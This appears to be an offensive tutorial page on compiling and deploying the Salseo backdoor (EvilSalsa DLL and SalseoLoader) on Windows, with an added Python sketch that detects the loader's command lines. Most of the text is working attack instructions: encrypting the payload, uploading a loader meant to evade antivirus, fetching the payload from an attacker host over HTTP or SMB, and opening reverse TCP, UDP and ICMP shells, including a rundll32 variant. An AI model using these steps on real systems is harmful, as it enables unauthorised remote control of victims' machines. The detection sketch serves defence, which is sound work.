Download the source code from the github and compile EvilSalsa and SalseoLoader. You will need Visual Studio installed to compile the code.
Compile those projects for the architecture of the Windows box where you are going to use them (if the Windows box supports x64, compile them for that architecture).
You can select the architecture inside Visual Studio in the left "Build" tab, under "Platform Target".
(If you can't find this option, click the "Project" tab and then "<Project Name> Properties".)
Then, build both projects (Build -> Build Solution). The path of the executable will appear in the logs:
First of all, you will need to encode the EvilSalsa.dll. To do so, you can use the python script encrypterassembly.py or you can compile the project EncrypterAssembly:
```
python EncrypterAssembly/encrypterassembly.py <FILE> <PASSWORD> <OUTPUT_FILE>
python EncrypterAssembly/encrypterassembly.py EvilSalsax.dll password evilsalsa.dll.txt
EncrypterAssembly.exe <FILE> <PASSWORD> <OUTPUT_FILE>
EncrypterAssembly.exe EvilSalsax.dll password evilsalsa.dll.txt
```
OK, now you have everything you need to run Salseo: the encoded EvilSalsa.dll and the SalseoLoader binary.
Upload the SalseoLoader.exe binary to the machine. It shouldn't be detected by any AV...
Remember to start a nc as the reverse shell listener and an HTTP server to serve the encoded evilsalsa.
```
SalseoLoader.exe password http://<Attacker-IP>/evilsalsa.dll.txt reversetcp <Attacker-IP> <Port>
```
Remember to start a nc as the reverse shell listener, and an SMB server to serve the encoded evilsalsa (impacket-smbserver).
```
SalseoLoader.exe password \\<Attacker-IP>/folder/evilsalsa.dll.txt reverseudp <Attacker-IP> <Port>
```
This time you need a special tool in the client to receive the reverse shell. Download: https://github.com/inquisb/icmpsh
```
sysctl -w net.ipv4.icmp_echo_ignore_all=1
# When you finish, you can enable it again by running:
sysctl -w net.ipv4.icmp_echo_ignore_all=0
python icmpsh_m.py "<Attacker-IP>" "<Victim-IP>"
```
```
SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp <Attacker-IP>
```
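From the defender's side, the three loader invocations above share one argument shape (`<password> <payload> <mode> <IP> [port]`) that stays the same when the binary is renamed. The following is an added detection sketch, not code from HackTricks or the Salseo project; the function names and the sample command lines are constructed for illustration, and it assumes you already collect process-creation command lines.

```python
import re
import shlex

MODES = {"reversetcp", "reverseudp", "reverseicmp"}   # mode keywords shown on the page
IPV4 = re.compile(r"^(?:\d{1,3}\.){3}\d{1,3}$")
REMOTE = re.compile(r"^(?:https?://|\\\\)", re.I)      # HTTP URL or UNC share


def classify(cmdline):
    """Return a finding dict when the command line has the shape
    <image> <password> <payload> <mode> <ip> [port], else None."""
    try:
        argv = [t.strip('"') for t in shlex.split(cmdline, posix=False)]
    except ValueError:          # unbalanced quotes: fall back to a plain split
        argv = cmdline.split()
    for i, tok in enumerate(argv):
        mode = tok.lower()
        if mode not in MODES or i < 3 or i + 1 >= len(argv):
            continue
        host = argv[i + 1]
        port = argv[i + 2] if i + 2 < len(argv) else None
        if not IPV4.match(host):
            continue
        # The TCP and UDP modes carry a port; the ICMP mode does not.
        if mode != "reverseicmp" and not (port and port.isdigit()):
            continue
        payload = argv[i - 1]
        return {"image": argv[0], "mode": mode, "callback": host, "port": port,
                "payload": payload, "remote_payload": bool(REMOTE.match(payload))}
    return None


# Constructed process-creation command lines (not taken from a real host).
SAMPLES = [
    r"C:\Users\Public\svc.exe hunter2 http://192.0.2.10/a.dll.txt reversetcp 192.0.2.10 4444",
    r"updater.exe hunter2 \\192.0.2.10\share\a.dll.txt reverseudp 192.0.2.10 53",
    r"C:\Temp\x.exe hunter2 C:/Temp/a.dll.txt reverseicmp 192.0.2.10",
    r"ping.exe -n 4 192.0.2.10",
    r"notes.exe reversetcp 192.0.2.10 4444",
]

def scan(lines):
    """Return (line, finding) pairs for every matching command line."""
    return [(line, hit) for line in lines if (hit := classify(line))]

if __name__ == "__main__":
    for line, hit in scan(SAMPLES):
        print(hit["mode"], hit["callback"], hit["port"], "<-", line)
```

The DLL variant described later on this page reads the same values from environment variables, so it does not appear in command-line telemetry and needs a separate signal.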
Open the SalseoLoader project using Visual Studio.
The files DllExport.bat and DllExport_Configure.bat have appeared in your project folder.
Press Uninstall (yeah, it's weird but trust me, it is necessary)
Just exit Visual Studio
Then, go to your SalseoLoader folder and execute DllExport_Configure.bat
Select x64 (if you are going to use it inside a x64 box, that was my case), select System.Runtime.InteropServices (inside Namespace for DllExport) and press Apply
[DllExport] should no longer be marked as an error
Select Output Type = Class Library (Project --> SalseoLoader Properties --> Application --> Output type = Class Library)
Select x64 platform (Project --> SalseoLoader Properties --> Build --> Platform target = x64)
To build the solution: Build --> Build Solution (Inside the Output console the path of the new DLL will appear)
Copy and paste the Dll where you want to test it.
Execute:
```
rundll32.exe SalseoLoader.dll,main
```
If no error appears, probably you have a functional DLL!!
Don't forget to use an HTTP server and set a nc listener.
```
$env:pass="password"
$env:payload="http://10.2.0.5/evilsalsax64.dll.txt"
$env:lhost="10.2.0.5"
$env:lport="1337"
$env:shell="reversetcp"
rundll32.exe SalseoLoader.dll,main
```
```
set pass=password
set payload=http://10.2.0.5/evilsalsax64.dll.txt
set lhost=10.2.0.5
set lport=1337
set shell=reversetcp
rundll32.exe SalseoLoader.dll,main
```